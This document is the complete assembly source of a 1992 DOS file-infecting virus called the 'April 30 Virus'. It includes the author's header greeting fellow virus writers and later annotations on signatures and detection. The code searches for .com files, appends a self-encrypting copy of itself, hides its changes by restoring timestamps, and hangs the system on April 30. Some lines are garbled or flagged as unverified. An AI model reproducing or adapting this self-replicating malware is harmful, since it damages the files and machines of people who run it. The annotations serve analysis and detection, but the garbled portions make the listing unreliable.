;******************************************************************************
;* Written in *
;* April 30 Virus - Strain A A86 V3.22 *
;* ---------- *
;******************************************************************************
;* "NightBird goes, *
;* Along with the Queen..." *
;******************************************************************************
; You are now looking at the result of my very first attempt to code
; a Virus. This virus is a non-Resident Self- encrypting Direct Action
; Com Infecter, which doesn't infect Command.com. The Virus is only active
; on April 30, showing the Message and Hanging the System.....
; You can recognize an infected File simply, the 4th Byte is a 'N'ightBird.
;
; Disclaimer: The Author will not be held responsible for any actions
; caused by this Virus.
;
; Note: Don't just say: " another booring virus.. ", instead
; be a teaching aid, and search for my pitfalls, (ofcoz
; if there are any!), so I can improve my code....
; Please do so.....
;
; Enough of that crap talk,
; Greetingz go to... : John Tardy / TridenT and all other Members..
; : Serge of (Ex) House Designs
; : All Virus-Writers around the globe
;
; Well that's it for now.....
;
; C U & Have pHun,
; (c) NightBird Dec. 1992.
; ---------------------------------------------------------------------------
; Entry stub and decryptor. This is the only part of the appended code that
; is stored in the clear in an infected file (Prog .. Restore, Decryptlen
; bytes); everything from Restore onward is stored encrypted.
; Analyst notes:
;   * an infected file starts with E9 xx xx 'N' (see Jmp_to_Virus), so the
;     4th byte 'N' after a near jump is the infection marker;
;   * the stub bytes are constant apart from the one-byte key at Key+1,
;     which makes the stub itself usable as a scan signature.
; ---------------------------------------------------------------------------
org 100h ; COM image: DOS loads the file at offset 100h
Start: jmp Prog ; first-generation layout: jump over the marker byte
db 'N' ; marker byte, 4th byte of the file
Prog: Push ax ; preserve the entry value of AX (popped again at End_Virus)
call Main ; call/pop pair: pushes the run-time address of Main
Main: pop bp ; bp = run-time address of Main
sub bp , offset Main ; bp = run-time minus assemble-time address (relocation delta)
lea si , Restore [ bp ] ; si = start of the encrypted body
mov di , si ; di = si: the body is decrypted in place
mov cx , CrypterLen ; byte count of the encrypted body
Decrypt: lodsb ; al = next body byte
Key: Add al , 0 ; one-byte additive key; the immediate is patched at Continue (0 in this source build)
stosb ; write the byte back
loop Decrypt ; repeat for CrypterLen bytes
Decryptlen equ $ - Prog ; size of the clear-text stub
; ---------------------------------------------------------------------------
; Host repair and date trigger.
; Copies the 4 saved host bytes back to 100h, then asks DOS for the date.
; On April 30 the message at Txt is printed and the machine is hung; on any
; other date execution continues at Start_Virus.
; ---------------------------------------------------------------------------
Restore: lea si ,[ bp + Restore_Host ] ; source: the host's saved first 4 bytes
mov di , 100h ; destination: start of the COM image
movsw ; copy bytes 0-1
movsw ; copy bytes 2-3 (overwrites the jump and the marker in memory)
mov ah , 2ah ; DOS Get Date: DH = month, DL = day
int 21h ;
cmp dh , 4 ; month == 4 (April)?
jne Start_Virus ; no: skip the payload
cmp dl , 30 ; day == 30?
jne Start_Virus ; no: skip the payload
mov ah , 09h ; DOS print '$'-terminated string
lea dx , Txt [ bp ] ; DS:DX = relocated address of Txt
int 21h ;
HyperSpace: cli ; interrupts disabled ...
jmp HyperSpace ; ... and an endless loop: the system stays hung until reset
; ---------------------------------------------------------------------------
; Set-up before the file search: INT 24h (critical error) is hooked so that
; DOS error prompts are answered by Newint24h, the DTA is moved to offset
; 0FC00h (Dta), and a Find First for '*.com' is issued. Filespec has no path
; component, so DOS searches the current directory.
; Search is re-entered from Find_Next_one with AH = 4Fh (Find Next).
; ---------------------------------------------------------------------------
Start_Virus: mov ax , 3524h ; DOS Get Interrupt Vector, INT 24h; result returned in ES:BX
int 21h ;
lea Oldint24h [ bp ], es ; per the original comment: store the returned vector in Oldint24h
lea Oldint24h + 2 [ bp ], bx ; NOTE(review): encoding of these two lines as printed not verified
push cs ;
pop es ; ES = CS again (the AH=35h call changed ES)
mov ax , 2524h ; DOS Set Interrupt Vector, INT 24h; new handler passed in DS:DX
lea dx , Newint24h ; DX = Newint24h
int 21h ;
mov ah , 1ah ; DOS Set DTA
mov dx , dta ; DS:DX = 0FC00h, away from the default DTA at PSP:80h
int 21h ;
mov ah , 4eh ; DOS Find First
Search: lea dx ,[ bp + Filespec ] ; DS:DX = '*.com' pattern
xor cx , cx ; attribute mask 0
int 21h ;
jnc Found ; carry clear: a match is described in the DTA
jmp End_Virus ; carry set: no (more) matches, clean up and run the host
; ---------------------------------------------------------------------------
; Candidate checks for the file named in the DTA (name field at dta + 1Eh).
; A file is passed over when it looks like COMMAND.COM, when its first two
; bytes are an EXE signature, or when its 4th byte is already 'N'.
; Values pushed here (attributes, then time, then date) are popped by Close.
; ---------------------------------------------------------------------------
Found: cmp word ptr [ bp + offset dta + 35 ], 'DN' ; two bytes at name offset 5; per the original comment the COMMAND.COM check
je Find_Next_one ; match: leave the file alone
mov ax , 4300h ; DOS Get File Attributes
mov dx , dta + 1eh ; DS:DX = file name field inside the DTA
int 21h ; CX = attributes
push cx ; saved; popped in Close
mov ax , 4301h ; DOS Set File Attributes
mov cx , cx ; CX is left exactly as read above
int 21h ;
mov ax , 3d02h ; DOS Open, access mode 2 (read/write)
int 21h ; DX still holds dta + 1eh from above
xchg ax , bx ; BX = file handle for the calls that follow
mov ax , 5700h ; DOS Get File Date/Time
int 21h ; CX = time, DX = date
push cx ; time saved
push dx ; date saved; Close writes both back, so the timestamp is unchanged
mov ah , 3fh ; DOS Read
lea dx ,[ bp + Restore_Host ] ; buffer: the 4-byte host-header slot
mov cx , 4 ; first 4 bytes of the candidate
int 21h ;
mov ax ,[ Restore_Host + bp ] ; ax = first two bytes just read
cmp ax , 'MZ' ; EXE signature ...
je Exit ;
cmp ax , 'ZM' ; ... in either byte order
je exit ;
mov ah ,[ bp + Restore_Host + 3 ] ; ah = 4th byte of the candidate
cmp ah , 'N' ; marker present means already infected
jne Infect ; no marker: go on to Infect
; Rejected candidate: Close restores timestamp and attributes and closes the handle
Exit: Call Cl ose
Find_Next_one: mov ah , 4fh ; DOS Find Next
jmp Search ; reuse the Find First call site
; ---------------------------------------------------------------------------
; Infection of one file (handle in BX).
; Observable effects on the file, useful for detection and triage:
;   * the file grows by Virlen bytes, appended at the old end of file;
;   * the first 4 bytes become E9 <size-3> 'N' (Jmp_to_Virus);
;   * the appended block is a constant clear-text stub followed by a body
;     encrypted with a one-byte additive key taken from the clock, so the
;     body differs per infection while the stub does not;
;   * date, time and attributes are put back by Close.
; Only files with a size above Minlen and below 0FB00h are modified.
; ---------------------------------------------------------------------------
Infect: mov ax , 4202h ; DOS Seek, origin = end of file
xor cx , cx ; offset high word = 0
xor dx , dx ; offset low word = 0
int 21h ; AX = low word of the file size
cmp ax , 0fb00h ; size >= 0FB00h:
jae Exit ; skip the file
cmp ax , Minlen ; size <= Minlen (2 * Virlen):
jbe Exit ; skip the file
sub ax , 3 ; jump displacement = size - 3 (E9 rel16 is relative to the end of the 3-byte jump)
mov word ptr [ bp + Jmp_to_Virus ] + 1 , ax ; stored after the E9 opcode
Zero: mov ah , 2ch ; DOS Get Time
int 21h ; DL is used as the key
cmp dl , 0 ;
jne Continue ; non-zero: use it
jmp Zero ; zero: ask again
Continue: mov key + 1 [ bp ], dl ; patch the immediate operand of the Add at Key
lea si ,[ Prog + bp ] ; source: the clear-text stub
mov di , 0fd00h ; staging buffer at offset 0FD00h
mov cx , Decryptlen ;
rep movsb ; stub copied unchanged
lea si , Restore [ bp ] ; source: the body, currently decrypted in memory
mov cx , Crypterlen ;
Encrypt: lodsb ;
Sub al , dl ; inverse of the Add performed by the decryptor
stosb ; encrypted byte goes to the staging buffer after the stub
loop encrypt ;
mov ah , 40h ; DOS Write
lea dx , 0fd00h ; from the staging buffer
mov cx , virlen ; stub + body
int 21h ; file pointer is still at end of file from the seek above
mov ax , 4200h ; DOS Seek, origin = start of file
xor cx , cx ;
xor dx , dx ;
int 21h ;
mov ah , 40h ; DOS Write
lea dx , Jmp_to_Virus [ bp ] ; the 4-byte jump + marker header
mov cx , 4 ;
int 21h ;
call cl ose ; restore timestamp and attributes, close the handle
; ---------------------------------------------------------------------------
; Clean-up and hand-over to the host: INT 24h is set again, the DTA goes
; back to PSP:80h, AX is restored and control returns to offset 100h, where
; the host's original first 4 bytes were put back at Restore.
; ---------------------------------------------------------------------------
End_Virus: mov ax , 2524h ; DOS Set Interrupt Vector, INT 24h; vector passed in DS:DX
lea bx , Oldint24h [ bp ] ; per the original comment: put the previous handler back
mov ds , bx ; NOTE(review): DS and DX are filled from lea results here;
lea dx , Oldint24h + 2 [ bp ] ; verify the vector actually installed against a sample
int 21h ;
push cs ;
pop ds ; DS = CS again
mov ah , 1ah ; DOS Set DTA
mov dx , 80h ; default DTA at PSP:80h
int 21h ;
pop ax ; AX as pushed at Prog
mov di , 100h ;
push di ; 100h becomes the return address
ret ; near return to 100h: the host program runs
; ---------------------------------------------------------------------------
; Close: called with the handle in BX and, beneath the return address, the
; date, time and attributes pushed at Found. Writes the original date/time
; back, closes the handle and re-applies the saved attributes, which is why
; an infected file keeps its original timestamp.
; Clobbers AX, CX, DX, SI.
; ---------------------------------------------------------------------------
Close: pop si ; take the return address off so the saved values can be popped
pop dx ; saved file date
pop cx ; saved file time
mov ax , 5701h ; DOS Set File Date/Time
int 21h ;
mov ah , 3eh ; DOS Close
int 21h ;
mov ax , 4301h ; DOS Set File Attributes
pop cx ; saved attributes
mov dx , dta + 1eh ; DS:DX = file name field inside the DTA
int 21h ;
push si ; return address back on the stack
ret ;
; Replacement INT 24h (critical error) handler: answers every error with
; AL = 3 and returns, so no DOS error prompt appears while files are handled.
Newint24h: mov al , 3 ; response code handed back to DOS
iret ;
; ---------------------------------------------------------------------------
; Data area. Everything here lies after Restore and is therefore inside the
; encrypted region of an infected file: the strings below do not appear in
; plain text there.
; ---------------------------------------------------------------------------
; 4-byte slot for the previous INT 24h vector
Oldint24h dd 0
; First 4 bytes of the host; CD 20 (int 20h) in this first-generation build
Rest ore_Host db 0cdh , 20h , 0 , 0
; Header written over the start of an infected file: E9 rel16 + marker 'N'
Jmp_to_Virus db 0e9h , 0 , 0 , 'N'
; Search pattern for Find First / Find Next
Filespec db '*.com' , 0
; '$'-terminated message printed on April 30 (7 = BEL)
Txt db 13 , 10 , 9 , 9 , '"NightBird goes,' , 10 , 'Along with the Queen..."' , 13 , 10 , 7 , '$'
; Embedded name string; not referenced by the code in this listing
Names db '*April 30 Virus*'
; Offset used for the relocated DTA
Dta equ 0fc00h
; Length of the encrypted body (Restore to end)
Crypterlen equ $ - Restore
; Total appended length (Prog to end) = growth of an infected file
Virlen equ $ - Prog
; Files of this size or smaller are not modified
Minlen equ Virlen * 2
; ----------------------------------------------------------------------
; ------> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <------
; ---> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <---
; ----------------------------------------------------------------------